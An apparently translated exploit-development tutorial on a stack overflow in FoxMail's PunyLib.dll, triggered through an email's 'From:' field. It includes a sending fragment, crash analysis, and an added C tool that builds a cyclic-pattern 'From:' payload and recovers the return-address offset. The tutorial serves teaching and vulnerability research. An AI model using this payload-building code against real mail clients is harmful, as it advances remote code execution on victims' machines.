(Demonstrated on the FoxMail vulnerability: how to determine the location of the overflow return point. Here we use the FoxMail vulnerability to practise the essential first step of any buffer overflow, finding the position in the payload that lands on the saved return address. For details see xfocus/articles/200403/683.html.

First, a brief introduction to the FoxMail vulnerability. The problem lies in the UrlToLocal function in PunyLib.dll. When an email is classified as spam, UrlToLocal is called to process it, and a stack overflow occurs while it handles the "From:" field of the message, which can lead to the execution of arbitrary code. Because the number of bytes sent cannot exceed 0x200, we first send 0x150 bytes of 'A' (0x41) for the test. The sending code (the article's fragment, corrected to compile: lowercase C library names and a terminator so that %s stops at 0x150 bytes) is:

    memset(buffer, 0x41, 0x150);
    buffer[0x150] = '\0';
    sprintf(temp, "From:%s\r\n", buffer);
    send(sock, temp, strlen(temp), 0);

The result observed is:

    Access violation at address 02FA1BAB in module 'punylib.dll'. Write of address 41414141

Some explanation is needed here. Normally, when we use an overflow point to return into our shellcode, what we want is for the program to read its return address from the overwritten stack slot, so the crash shows EIP = 41414141 (a fault on fetching code from that address). Here the fault is a write to address 41414141, which indicates the data we submitted was too long: it not only covered the saved EIP but also overwrote parameters or local pointers that the function still uses after the copy. Before the function could return, it wrote through one of those pointers, whose value was now 41414141, an address the underlying memory manager cannot write to, and that produced the write access violation above. What we need to do next is shorten the payload so that it still overwrites the return address but stops short of the data beyond it, and then identify which offset of the payload landed on EIP.

Source: The method of locating the ShellCode position, demonstrated with the FoxMail vulnerability.pdf)
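The article stops at "shorten the payload"; the following is an added example (not code from the article or from FoxMail) of how a practitioner actually pins down the return-address offset once the payload length is in the right range. A payload of identical 0x41 bytes can only ever tell you that something was overwritten, because 41414141 matches every position. A non-repeating cyclic pattern (the Metasploit-style "Aa0Aa1..." sequence) lets you map the value the debugger reports, whether EIP or the "Write of address ..." pointer, back to the byte offset in the payload that produced it. The 0x200 limit, the "From:" prefix and the 0x150 test length come from the article; the fault value used in main() is constructed for illustration, not a real crash.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Metasploit-style cyclic pattern "Aa0Aa1Aa2...Zz9". Every 4-byte window is
 * unique within the first 20280 bytes, far beyond the 0x200-byte send limit,
 * and "AAAA" never occurs in it (positions alternate upper/lower/digit). */
size_t make_pattern(char *out, size_t len)
{
    size_t n = 0;
    for (char u = 'A'; u <= 'Z' && n < len; u++)
        for (char l = 'a'; l <= 'z' && n < len; l++)
            for (char d = '0'; d <= '9' && n < len; d++) {
                const char trip[3] = { u, l, d };
                for (int i = 0; i < 3 && n < len; i++)
                    out[n++] = trip[i];
            }
    return n;
}

/* The little-endian DWORD at offset `off`: what x86 loads into EIP (or into a
 * pointer register) from the pattern bytes sitting in that stack slot. */
uint32_t dword_at(const char *pat, size_t off)
{
    const unsigned char *p = (const unsigned char *)pat + off;
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* Map a faulting value (EIP, or the "Write of address ..." pointer) back to
 * the payload offset it came from. Returns -1 when the value is not in the
 * pattern, which is exactly the situation with 0x41414141 from all-'A' data. */
long pattern_offset(const char *pat, size_t len, uint32_t fault_value)
{
    unsigned char needle[4];
    for (int i = 0; i < 4; i++)
        needle[i] = (unsigned char)(fault_value >> (8 * i));
    for (size_t i = 0; i + 4 <= len; i++)
        if (memcmp(pat + i, needle, 4) == 0)
            return (long)i;
    return -1;
}

/* Build the "From:" line the test harness sends, enforcing the article's
 * 0x200-byte limit per send. Returns the line length, or -1 if it does not fit. */
long build_from_line(char *out, size_t outsz, const char *payload, size_t paylen)
{
    const char prefix[] = "From:";
    const char suffix[] = "\r\n";
    size_t total = (sizeof prefix - 1) + paylen + (sizeof suffix - 1);
    if (total > 0x200 || total + 1 > outsz)
        return -1;
    memcpy(out, prefix, sizeof prefix - 1);
    memcpy(out + sizeof prefix - 1, payload, paylen);
    memcpy(out + sizeof prefix - 1 + paylen, suffix, sizeof suffix - 1);
    out[total] = '\0';
    return (long)total;
}

/* A 0x150-byte pattern matching the article's first test length. */
const char *pattern_0x150(void)
{
    static char pat[0x150];
    if (pat[0] == '\0')
        make_pattern(pat, sizeof pat);
    return pat;
}

int main(void)
{
    char line[0x200 + 1];
    const char *pat = pattern_0x150();
    long n = build_from_line(line, sizeof line, pat, 0x150);
    printf("sending %ld bytes: %.16s...\n", n, line);

    /* Constructed fault value: pretend the debugger reported the bytes at 0x10c. */
    uint32_t reported = dword_at(pat, 0x10c);
    printf("fault value %08x -> payload offset %ld\n", reported,
           pattern_offset(pat, 0x150, reported));
    printf("fault value 41414141 -> offset %ld (all-'A' payload gives no position)\n",
           pattern_offset(pat, 0x150, 0x41414141));
    return 0;
}
```

Usage in practice: send the pattern in place of the 0x41 bytes, read the value the debugger reports, and feed it to pattern_offset; the result is the offset at which the four bytes of the return address must be placed. If the report is still a write fault rather than EIP, the offset it yields is that of an overwritten pointer, so the payload must be cut to end before it.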